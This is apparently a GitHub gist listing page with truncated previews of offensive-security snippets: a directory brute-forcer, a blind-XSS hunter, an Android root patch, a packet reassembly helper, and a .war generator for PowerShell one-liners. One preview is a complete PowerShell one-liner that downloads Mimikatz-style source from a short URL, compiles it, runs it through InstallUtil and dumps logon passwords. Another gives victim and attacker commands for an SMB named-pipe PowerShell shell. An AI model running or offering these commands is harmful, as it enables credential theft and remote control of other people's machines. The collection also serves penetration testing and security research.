Steve Campbell sdcampbell
nullenc0de
/ aodirb.py
Created
November 21, 2022 15:17
pip3 install asyncio and pip3 install import aiohttp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import aiohttp | |
| import time | |
| import sys | |
| import argparse | |
| import os | |
| parser = argparse.ArgumentParser(description='Directory Bruteforce') | |
| parser.add_argument('-u', '--url', help='URL to bruteforce', required=True) | |
| parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True) |
tothi
/ magisk_ramdisk_patch_avd.sh
Last active
May 10, 2025 13:22
Apply Magisk patches on AVD (Android Emulator) RAMDISK images for running Magisk (root) on Android Emulators
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # patch ramdisk.img (for installing Magisk on x64 Android emulator) | |
| # | |
| # x86_64 on Android 12 (API Level 32) is supported/tested currently | |
| # | |
| # install AVD: | |
| # | |
| # sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64' |
vavkamil
/ blind-xss-cloudflare-worker.js
Last active
November 2, 2023 14:43
Serverless Blind XSS hunter with Cloudflare Worker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| addEventListener("fetch", event => { | |
| event.respondWith(handleRequest(event.request)) | |
| }) | |
| //////////////////////////////////////////////////////////////////////////////////////////////////// | |
| // ! DON'T LEAK THE SECRETS ! | |
| // Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/ | |
| const telegram_token = "*****REDACTED*****"; | |
| const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
Rich5
/ basictable.py
Last active
October 1, 2020 01:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| basictable | |
| Copyright (c) 2017 Rich Kelley | |
| Contact: | |
| @RGKelley5 | |
| RK5DEVMAIL[A T]gmail[D O T]com | |
| www.bytesdarkly.com | |
| License: MIT |
MarkBaggett
/ scapy_helper.py
Last active
March 25, 2024 21:59
Python - SCAPY - Full Packet Session Reassembly
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #From here https://pen-testing.sans.org/blog/2017/10/13/scapy-full-duplex-stream-reassembly | |
| def full_duplex(p): | |
| sess = "Other" | |
| if 'Ether' in p: | |
| if 'IP' in p: | |
| if 'TCP' in p: | |
| sess = str(sorted(["TCP", p[IP].src, p[TCP].sport, p[IP].dst, p[TCP].dport],key=str)) | |
| elif 'UDP' in p: | |
| sess = str(sorted(["UDP", p[IP].src, p[UDP].sport, p[IP].dst, p[UDP].dport] ,key=str)) |
mattifestation
/ gist:8ef36782ceb7f73d74cfb00c2a710301
Created
November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to run on the victim | |
| # This will establish a PowerShell listener over the "pwnme" named pipe | |
| remote /S "powershell.exe" pwnme | |
| # Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
| runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
| remote /C [Hostname\IP] "pwnme" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Code that quickly generates a deployable .war for a PowerShell one-liner | |
| import zipfile | |
| import StringIO | |
| import sys | |
| def generatePsWar(psCmd, appName): |